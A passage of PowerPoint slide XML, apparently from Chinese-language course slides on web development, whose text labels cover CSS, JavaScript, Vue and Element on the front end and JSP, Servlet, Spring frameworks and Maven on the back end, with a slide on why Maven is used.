            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3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CSS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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9" name="文本框 28"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6060754" y="4518486"/>
              <a:ext cx="660054" cy="673695"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1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表现</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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0" name="组合 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5524500" y="3140343"/>
            <a:ext cx="352115" cy="322689"/>
            <a:chOff x="8605669" y="3426337"/>
            <a:chExt cx="1897235" cy="1765837"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="圆角矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2700000">
              <a:off x="8612966" y="3419040"/>
              <a:ext cx="1722634" cy="1737228"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="84000">
                  <a:srgbClr val="67FECF"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="3000000" scaled="0"/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="inpin heiti" panose="00000500000000000000" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="文本框 31"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8608288" y="4007201"/>
              <a:ext cx="1894616" cy="1010540"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3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JavaScript</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3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3" name="文本框 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9179492" y="4518479"/>
              <a:ext cx="704447" cy="673695"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1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行为</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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4" name="组合 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6017010" y="3088607"/>
            <a:ext cx="433199" cy="407592"/>
            <a:chOff x="3383301" y="4971185"/>
            <a:chExt cx="1323165" cy="1244953"/>
          </a:xfrm>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="圆角矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2700000">
              <a:off x="3418639" y="4965913"/>
              <a:ext cx="1244953" cy="1255498"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="79000">
                  <a:schemeClr val="accent2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                    <a:alpha val="58000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:srgbClr val="AF76B0"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="3000000" scaled="0"/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="203200" dist="38100" dir="5400000" sx="101000" sy="101000" algn="t" rotWithShape="0">
                <a:schemeClr val="accent2">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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="inpin heiti" panose="00000500000000000000" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="文本框 35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3719652" y="5286709"/>
              <a:ext cx="720739" cy="329027"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1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Vue</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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7" name="文本框 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3383301" y="5607697"/>
              <a:ext cx="1323165" cy="345869"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" fontAlgn="auto">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1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简化</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1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JavaScript</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1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的开发框架</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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8" name="组合 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5734636" y="3910014"/>
            <a:ext cx="392494" cy="389197"/>
            <a:chOff x="3479046" y="4810710"/>
            <a:chExt cx="1577241" cy="1563994"/>
          </a:xfrm>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="圆角矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2700000">
              <a:off x="3485670" y="4804086"/>
              <a:ext cx="1563994" cy="1577241"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="79000">
                  <a:schemeClr val="accent2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                    <a:alpha val="58000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:srgbClr val="AF76B0"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="3000000" scaled="0"/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="203200" dist="38100" dir="5400000" sx="101000" sy="101000" algn="t" rotWithShape="0">
                <a:schemeClr val="accent2">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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="inpin heiti" panose="00000500000000000000" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="文本框 39"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3656094" y="5179634"/>
              <a:ext cx="1223146" cy="494723"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2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Element</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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1" name="文本框 40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3531966" y="5498025"/>
              <a:ext cx="1403878" cy="547800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" fontAlgn="auto">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1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基于</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1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Vue</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1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的前端组件库，快速构建网页</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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42" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2664759" y="2155053"/>
            <a:ext cx="1550895" cy="2307185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:srgbClr val="00B0F0">
                  <a:lumMod val="87000"/>
                  <a:lumOff val="13000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="37000"/>
                  <a:satMod val="300000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>后端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319533" y="2155053"/>
            <a:ext cx="3383391" cy="715250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:srgbClr val="00B0F0">
                  <a:lumMod val="87000"/>
                  <a:lumOff val="13000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="37000"/>
                  <a:satMod val="300000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>项目结构管理：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maven</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319532" y="2943137"/>
            <a:ext cx="3383391" cy="715250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:srgbClr val="00B0F0">
                  <a:lumMod val="87000"/>
                  <a:lumOff val="13000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="37000"/>
                  <a:satMod val="300000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基础：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Servlet</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319532" y="3746988"/>
            <a:ext cx="3383391" cy="715250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:srgbClr val="00B0F0">
                  <a:lumMod val="87000"/>
                  <a:lumOff val="13000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="37000"/>
                  <a:satMod val="300000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>框架：Struts2、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SpringMVC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SpringBoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SpringCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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MAVEN</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId1"/>
          <a:srcRect b="6536"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8916966" y="2676525"/>
            <a:ext cx="2687316" cy="676221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721200" y="3690517"/>
            <a:ext cx="10749599"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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为什么用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maven?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="765609" y="4281214"/>
            <a:ext cx="11000633" cy="1537897"/>
            <a:chOff x="1024418" y="5599087"/>
            <a:chExt cx="10401146" cy="1537897"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1496828" y="5969292"/>
              <a:ext cx="9928736" cy="1167692"/>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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="l"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>依赖管理</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>方便快捷的管理项目依赖的资源</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>(jar</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>包</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>，避免版本冲突问题</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="l"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>统一项目结构。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>提供标准、统一的项目结构</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="l"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>项目构建。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>标准跨平台（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Linux</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Windows</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>MacOS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>）的自动化项目构建方式</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="l"/>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
